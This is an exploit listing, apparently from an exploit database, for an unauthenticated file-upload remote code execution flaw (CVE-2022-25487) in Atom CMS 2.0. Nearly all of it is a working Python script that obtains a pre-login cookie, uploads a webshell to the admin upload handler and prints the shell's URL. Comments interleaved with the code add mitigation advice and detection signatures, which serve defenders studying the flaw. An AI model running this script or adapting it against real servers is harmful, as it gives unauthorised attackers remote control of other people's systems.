## https://sploitus.com/exploit?id=PACKETSTORM:166532
# Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE)  
# Date: 22.03.2022  
# Exploit Author: Ashish Koli (Shikari)  
# Vendor Homepage: https://thedigitalcraft.com/  
# Software Link: https://github.com/thedigicraft/Atom.CMS  
# Version: 2.0  
# Tested on: Ubuntu 20.04.3 LTS  
# CVE: CVE-2022-25487  
  
# Description  
This script uploads webshell.php to Atom CMS. The application stores the file in the uploads directory under a unique numeric name, which allows us to access the webshell.
  
# Usage : python3 exploit.py <IP> <Port> <atomcmspath>  
# Example: python3 exploit.py 127.0.0.1 80 /atom  
  
# POC Exploit: https://youtu.be/qQrq-eEpswc  
# Note: Crafted "Shell.txt" file is required for exploitation which is available on the below link:  
# https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC  
  
'''  
Description:  
A file upload functionality in Atom CMS 2.0 allows any  
non-privileged user to gain access to the host through the uploaded files,  
which may result in remote code execution.  
'''  
  
#!/usr/bin/python3  
'''  
Import required modules:  
'''  
import sys  
import requests  
import json  
import time  
import urllib.parse  
import struct  
import re  
import string  
import linecache  
  
  
  
# Proxy map for HTTP and HTTPS traffic, both pointing at localhost:8080
# (presumably a local intercepting proxy used while developing the PoC).
# NOTE(review): in the code shown, neither the session.get() call nor the
# requests.post() call is given this mapping.
proxies = {
'http': 'http://localhost:8080',
'https': 'https://localhost:8080',
}
  
'''
User Input:
'''
# Three positional arguments: host, port, and the URL path where Atom CMS is
# installed (see the usage line in the file header). They are read without any
# validation and later concatenated directly into the request URLs.
# A missing argument raises IndexError here.
target_ip = sys.argv[1]
target_port = sys.argv[2]
atomcmspath = sys.argv[3]
  
  
'''
Get cookie
'''
# A plain GET of <atomcmspath>/admin with a fresh session. No credentials are
# sent, so whatever cookie the server sets here is a pre-login cookie.
session = requests.Session()
link = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin'
response = session.get(link)
# The cookie jar is dumped to JSON and the JSON punctuation is stripped by
# string replacement, leaving a "name=value" string used as the Cookie header.
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
  
'''
Upload Webshell:
'''
# Construct Header:
# Hand-built request headers that imitate a browser XHR coming from the admin
# user-edit page (see Referer). The only session material is the pre-login
# cookie gathered above.
# The multipart boundary is hard-coded, so the body read from shell.txt
# presumably has to use the same boundary -- the file's content is not shown here.
# Detection note: the User-Agent and boundary strings are static in this PoC,
# so they can serve as a signature for this exact script in web or proxy logs.
# Both are trivially changed, so treat a match as a hint and not as coverage.
header1 = {
'Host': target_ip,
'Accept': 'application/json',
'Cache-Control': 'no-cache',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',
'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L',
'Origin': 'http://' + target_ip,
'Referer': 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/index.php?page=users&id=1',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9',
'Cookie': cookie,
'Connection': 'close',

}
  
  
# loading Webshell payload:
# Reads the whole of shell.txt from the current working directory as raw bytes.
# Its content is not part of this listing; the file header says a crafted copy
# is required. The bytes are later sent unmodified as the request body.
# NOTE(review): the file handle is never closed in the code shown.
path = 'shell.txt'
fp = open(path,'rb')
data= fp.read()
  
  
# Uploading Webshell:
# The POST goes to admin/uploads.php?id=1 carrying only the pre-login cookie;
# no login request appears anywhere in this script. Per the file header, an
# upload handler that accepts this is the issue tracked as CVE-2022-25487.
# Mitigation: require an authenticated admin session in the upload handler,
# allow-list file extensions and content types, and disable script execution
# in the uploads directory (or store uploads outside the web root).
# Detection: a POST to /admin/uploads.php from a client with no preceding
# successful login, followed by a request for /uploads/<digits>.php.
link_upload = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/uploads.php?id=1'
upload = requests.post(link_upload, headers=header1, data=data)

# The response body is reduced to its digits: whitespace becomes newlines,
# the literal "1<br>Unknown" becomes "null", then every non-digit is dropped.
# The script treats what remains as the server-assigned file name.
# NOTE(review): "\s" in a non-raw string is an invalid escape sequence that
# newer Python versions warn about; r"\s" is the equivalent raw form.
p=upload.text
x = re.sub("\s", "\n", p)
y = x.replace("1<br>Unknown", "null")
z = re.sub('[^0-9]', '', y)
  
'''
Finish:
'''
# Prints the URL where the script expects the stored file: the uploads
# directory plus the digits recovered from the response, with a .php suffix.
# The HTTP status is never checked, so this line prints even if the upload
# was rejected.
# Defender note: file-integrity monitoring for newly created .php files under
# the CMS uploads directory covers this outcome regardless of how the upload
# request was shaped.
print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + atomcmspath + '/uploads/' + z + '.php')
print('')